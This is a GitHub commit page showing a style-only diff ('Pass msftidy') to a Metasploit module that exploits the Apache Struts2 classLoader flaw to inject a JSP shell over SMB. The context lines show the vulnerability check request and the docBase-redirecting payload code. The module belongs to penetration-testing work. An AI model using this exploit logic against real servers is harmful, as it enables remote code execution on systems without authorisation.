Skip to content

Commit dc02f83

Browse files
committed
Pass msftidy
1 parent a06eb04 commit dc02f83

File tree

1 file changed

+8
-8
lines changed

1 file changed

+8
-8
lines changed

modules/exploits/windows/http/struts_http_jspinject.rb

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
##
2-
# This module requires Metasploit: http//metasploit.com/download
2+
# This module requires Metasploit: http://metasploit.com/download
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
55

@@ -13,10 +13,10 @@ class Metasploit3 < Msf::Exploit::Remote
1313

1414
def initialize(info={})
1515
super(update_info(info,
16-
'Name' => 'Struts JSP Injection over HTTP',
16+
'Name' => 'Struts JSP Injection Over HTTP',
1717
'Description' => %q{
18-
This module exploits the classLoader Apache Struts2
19-
vulnerability to inject a JSP shell over SMB.
18+
This module exploits the classLoader Apache Struts2 vulnerability
19+
to inject a JSP shell over SMB.
2020
},
2121
'Author' => [
2222
'Matthew Hall <[email protected]>',
@@ -61,18 +61,18 @@ def check
6161
uri = datastore['URI'] + '?Class.classLoader.resources.dirContext.cacheObjectMaxSize=x'
6262
res = send_request_raw({'uri'=>uri})
6363

64-
if res and res.body =~ /No result defined for action/
64+
if res and res.body =~ /No result defined for action/
6565
return Exploit::CheckCode::Vulnerable
6666
else
6767
return Exploit::CheckCode::Unknown
6868
end
6969
end
7070

71-
def primer
72-
self.file_contents = payload.encoded
71+
def primer
72+
self.file_contents = payload.encoded
7373
print_status("File available on #{unc}...")
7474
share = "#{unc}"
75-
sploit = datastore['URI']
75+
sploit = datastore['URI']
7676
share = share.gsub(/\\/, '/')
7777
#sploit << '?class.classLoader.resources.dirContext.docBase='
7878
sploit << '?Class.classLoader.resources.dirContext.docBase='

0 commit comments

Comments
 (0)